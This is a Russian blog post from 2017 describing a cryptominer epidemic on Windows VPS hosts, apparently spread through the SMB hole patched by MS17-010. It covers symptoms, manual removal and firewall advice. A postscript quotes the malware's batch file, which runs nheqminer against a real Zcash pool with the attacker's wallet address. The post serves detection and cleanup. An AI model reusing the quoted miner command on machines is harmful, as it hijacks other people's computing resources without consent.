Эпидемия CPU Miner на Windows VPS
26 Apr 2017 | Автор: dd |Утром упало инфо.письмо от одного из хостеров о том, что у него на хостинге началась эпидемия виндовых машин, которые заражаются CPU майнером. Причем само сообщение носило характер зомби апокалипсиса “При этом наличие фаервола и сложные пароли никак не спасают” “Через эту дыру начали массово пихать на машины что попало” и ты.ды
Поскольку я с проблемой нигде не столкнулся, за что отдельное спасибо Comodo IS и Eset SS, то привожу инфу со слов представителя хостинга.
Основные симптомы того, что вам присадили на вашу винду CPU Miner:
- Машина дико тупит и тормозит, но при этом при вызове диспетчера задач (WIN + R -> taskmgr) нагрузка на проц падает, т.к CPU Miner выгружается из памяти;
- На машине присутствует папка вида: C:\Windows\winsxslog (на стандартной системе есть только системная директория winsxs);
- В сервисах имеется служба без описания с именем из случайного набора букв, например DHSWIQU (для каждой системы генерится случайным образом)
Лечение этой пакости идет следующим образом:
- Запускаем диспетчер задач, тем самым выгружая майнер;
- В диспетчере сервисов меняем тип запуска найденного абракадабрового сервиса с Автоматический на Отключено;
- Пробуем остановить его руками, но вероятнее всего не получится;
- Меняем реквизиты доступа на папку C:\Windows\winsxslog запрещая полный доступ в неё;
- Перегружаем машину
Теоретически можно перезагрузить в безопасном режиме, если есть KVM к виртуалке, и сносим все руками.
Теперь собственно о том, что это такое и как с этим жить.
Как я понимаю, это все поcледствие публикации пакета эксплоитов от хакерской тимы The Shadow Brokers, которые уперли у, связанной с АНБ, хакерской группировкой Equation Group полезный инструментарий и теперь публикуют его частями.
В середине апреля они выложили в паблики архив с эксплоитами для всей виндусовой линейки NT, 2000, 2003, 2008 и до 2012, а также для домашних версий XP, Vista, 7 и Windows 8.
Беглый просмотр описаний использовавшихся уязвимостей не вызвал особого восторга, т.к все они представляют собой древние, как говно мамонта, дырки. Но сообщество было взволновано и мелкомягкие срочно отписались, что дырки были прикрыты ранее, пакетами обновлений: MS17-010, MS10-061, MS09-050, MS08-067, большая часть из которых была включена в сервис паки, кроме обновления MS17-010 выпущенного в середине марта для систем старше Windows Vista.
Данное обновление прикрывает уязвимость SMB (Microsoft Server Message Block) при которой злоумышленник вгружает в открытый 445 порт произвольный код, запуская его дистанционно на машине. Откровенно говоря, я не очень понимаю, кто эти люди, что в 21 веке выставляют виндовую машину в инет, не прикрыв стандартные порты локалки, поскольку эпопея нагибания винды через 445 порт началась где то в 2001-2002 годах всем многообразием сетевых червей: сассер, делоадер, майтоб.
Так что первым шагом, после установки винды и Firefox для нормальной работы, следовала установка програмных IPS и фаервола из вышеупомянутых программных линеек: Comodo Internet Security и Eset Smart Security. Программные продукты IPS более надежны чем патчи от мелкомягких, т.к прикрывают возможные уязвимости исходя из анормальной активности, а не сигнатурной базы, т.ч могу перекрывать подобные 0-day уязвимости, а не только известные миру дырки.
Ну и банальный фаервол, где закрываются все порты (в случае штатного фаервола это можно прописать руками на интерфейсе), кроме стандартных 80, 8080, 443, 53, 20-22, 110, 25. Можно в принципе идти от обратного, закрывая все уязвимые виндовые порты 113, 135-139, 445, но лучше все же до 1024 порта открывать только стандартные порты использующиеся веб-сервисами.
З.Ы сегодня на серче нашли еще один вариант – директорию C:\wwwskype\ содержащую файлы
nheqminer.exe
wwwskype.bat
wwwskype.js
*.dll
при этом джсник вызывает из себя wwwskype.bat следующего содержания
cd C:\wwwskype\
start /b /LOW nheqminer.exe -l eu1-zcash.flypool.org:3333 -u t1J1BCXT5mg4VmammNkLv4SH5dcwemGfxAS.rig0117 -t -1
при проверке ESET видит файл nheqminer.exe как зловред Win64/BitCoinMiner.BW, камода и доктор веб пока не видят ничего. Я конечно не намекаю ни на что, но отчет сам по себе показателен.
